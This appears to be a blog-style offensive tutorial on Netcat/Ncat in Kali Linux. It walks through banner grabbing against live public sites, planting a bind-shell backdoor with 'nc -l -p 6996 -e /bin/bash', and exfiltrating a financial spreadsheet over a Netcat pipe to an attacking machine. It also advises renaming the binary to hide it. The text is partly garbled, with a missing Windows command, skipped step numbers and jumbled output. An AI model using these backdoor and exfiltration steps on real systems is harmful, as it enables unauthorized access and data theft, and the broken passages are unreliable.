ncat
NetCat (Ncat)
is a little known yet powerful tool designed to make raw socket
connections to network ports. It's a small tool designed to run from one
executable file that is easily transferred to a system and can also be renamed
to anything to hide the executable within an operating system. Ncat will call
back to an attacking server with only user-level access. Ncat is an open source
application brought to you by insecure.org, the same fine folks that maintain
NMap. Ncat, and its older cousin, nc, both come installed on Kali. Ncat is
bundled with any install of NMap.
Actually, as mentioned previously, there are
two versions of Ncat. The older version's executable is nc. Nc will also make
raw socket connections to any TCP/UDP ports:
1)
Open Netcat's Help Screen
Once
we've fired up our Kali Linux system and opened a terminal, we can use Netcat
from any directory since it's located in our bin directory which is in our PATH
variable by default. So, let's type nc -h to see its
help page.
2)
Get the Basics Syntax Down
As you
can see from the help screen above, the basic syntax for Netcat is the
following. (Substitute nc for ncat if
using Ncat instead of Netcat. We will just be using nc for
the rest of this guide.)
To connect to another machine:
nc <options> <host-IP-address> <port>
To
listen for inbound connections:
nc -l -p port
3)
Use Netcat to Connect to a
Remote System
Let's go ahead and use Netcat to connect to
a remote system. In this case, we will try to connect to a web server on port
80.
nc 192.168.1.105 80
That
command gives us a TCP connection, by default, to the web server (port 80) at
192.168.1.105. Now, whatever we type, we will be sent directly to the web
server when we hit enter.
4)
Use Netcat to Banner Grab
for OS Fingerprinting
Before attacking any system, we need to
know as much as possible about the target. So, once we have a TCP connection to
a web server, we can use Netcat to grab the banner of the web server that's
served up to new connections to identify what web-serving software the target
is running.
A
banner grab to the web server can be done with the HEAD / HTTP/1.0 command. Be careful and copy exactly as is with the
slashes and spaces. Alternatively, if this doesn't work, you can try HEAD / HTTP/1.1 instead.
HEAD / HTTP/1.0
Hit enter a few times and the web server will respond with its
banner telling us exactly what software it is running. In this case, we can see
that the web server is running Microsoft's IIS 7.5.
HTTP/1.1 200 OK
Content-Length: 998
Content-Type: text/html
Content-Location: http://192.168.1.105/index.html
Last-Modified: Wed, 26 Sep 2018 17:59:41 GMT
Accept-Ranges: bytes
Etag: "e245c46986ecc61:93f"
Server: Microsoft-IIS/7.5
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Sat, 08 Dec 2018 02:14:35 GMT
Conection: close
We
can use this technique on other public websites, as well. Let's try it on some
widely known sites and see what web server software they're running.
First, let's try this website, wonderhowto.com.
When we ping wonderhowto.com, we see that its IP address
is 104.193.19.59. So, we throw that into the command, then, after getting a
connection, we grab the web server banner. Remember to hit enter two
or three times. As we can see, wonderhowto.com is running its own WonderHowTo
server.
nc 104.193.19.59 80
HEAD / HTTP/1.0
HTTP/1.1 301 Moved
Permanently
Cache-Control:
no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Length: 141
Content-Type:
text/html; charset=utf-8
Expires: -1
Location:
https://wonderhowto.com/
Server: WonderHowTo
X-UA-Compatible:
IE=Edge,chrome=1
X-Server-Name: APP01
X-Content-Type-Options:
nosniff
Date: Sat, 08 Dec
2018 02:19:08 GMT
Connection:
keep-alive
But that doesn't seem right. Let's try again with HEAD / HTTP/1.1 instead. As seen below, we
get a bad request but do see that Microsoft-HTTPAPI/2.0 shows up, which is a
common reading when the actual server is a Microsoft-IIS version.
nc 104.193.19.59 80
HEAD / HTTP/1.1
HTTP/1.1 400 Bad Request
Content-Length: 334
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Sat, 08 Dec 2018 03:04:29 GMT
Connection: close
If we try the same thing with ebay.com,
we get the results below. As you can see, it runs on an Apache-Coyote.1.1
server.
nc 66.135.209.52 80
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: 49c752f2ba437586596f602605cb5820
Last-Modified: Fri, 8 Dec 2018 01:48:47 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 857
Date: Sat, 08 Dec 2018 02:38:44 GMT
Connection: keep-alive
Go ahead and try it on other websites and find out what server they're
running. However, note that it may not work for all sites or you may not see
the server information.
Now, let's use Netcat to create a listener on the remote
system. Let's assume that we have a Windows server that we have installed
Netcat on. We can now type the following to open a Netcat listener on port 6996
(it can be any port) on that system.
nc - l -p 6996
This has created a "listener" that we can connect to at our
leisure.
C:\>
C:\>
C:\>
C:\>
C:\>nc -l -p 6996
Note that on Windows systems, we can run this same command
with an upper case L to create a persistent
listener that will open up even if the system is rebooted.
6)
Now, let's create a backdoor on the target system that we
can come back to at any time. The command will vary slightly based upon whether
we are attacking a Linux or Windows system.
For Windows, we use:
For Linux, it's:
nc -l -p 6996 -e /bin/bash
This will open a listener on the system that will "pipe" the
command shell or the Linux bash shell to the connecting system.
Next, on our attacking system, we type the following
one-liner. As you can see, the Windows command prompt has been piped through
our Netcat connection directly to our attacking system. We own that box!
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\>
7)
Copy Files Out (Exfiltrate)
from the Target
Netcat can also be used to exfiltrate files and data from the target.
Let's imagine that there's data on the target system that we want, maybe
financial data or data stored in a database. We can use a stealth connection to
slowly copy that data out to our attack system. In this example, we will
exfiltrate a file called financialprojections.xls, presumably an Excel file
with financial projections.
From the source system, we type:
type financialprojections.xls | nc 192.168.1.104 6996
That command says to display the file financialprojections.xls,
then pipe (|) it to Netcat (nc) to IP
address 192.168.1.104 through port 6996.
10/09/2006 03:55
PM <DIR> wmpub
4
Files(s) 59,533 bytes
8
Dir(s) 4,876,210,176 bytes free
C:\>type financialprojections.xls | nc 192.168.1.104 6996
C:\>type financialprojections.xls | nc 192.168.1.104 6996
From the destination system, we type:
nc -l -p 6996 > financialprojections.xls
That command says to create a listener (l) on port (p) 6996, then
send the data received on this listener to a file named financialprojections.xls.
We can see in the code below, after using ls -l, that the file was
copied across our Netcat connection over port 6996 to our attacking machine!
ls -l
total 356
drwxr-xr-x 2 root root
4096 2011-05-07 11:46 Desktop
-rw-r--r-- 1 root root
141 2013-09-18 12:25 financialprojections.xls
-rw-r--r-- 1 root root
192 2013-09-02 13:49 replay_arp-0902-133213.cap
-rw-r--r-- 1 root root
0 2013-09-02 16:08 snortlog
-rw-r--r-- 1 root root 338111 2013-09-02 13:49 WEPcrack-01.cap
-rw-r--r-- 1 root root
575 2013-09-02 13:49 WEPcrack-01.csv
-rw-r--r-- 1 root root
582 2013-09-02 13:49 WEPcrack-01.kismet.csv
-rw-r--r-- 1 root root
3660 2013-09-02 13:49 WEPcrack-01.kismet.netxml
This is just a small sample of what this powerful little program can do.
When you combine it with some basic scripting skills, you can only imagine the
incredible things that can be accomplished.
No comments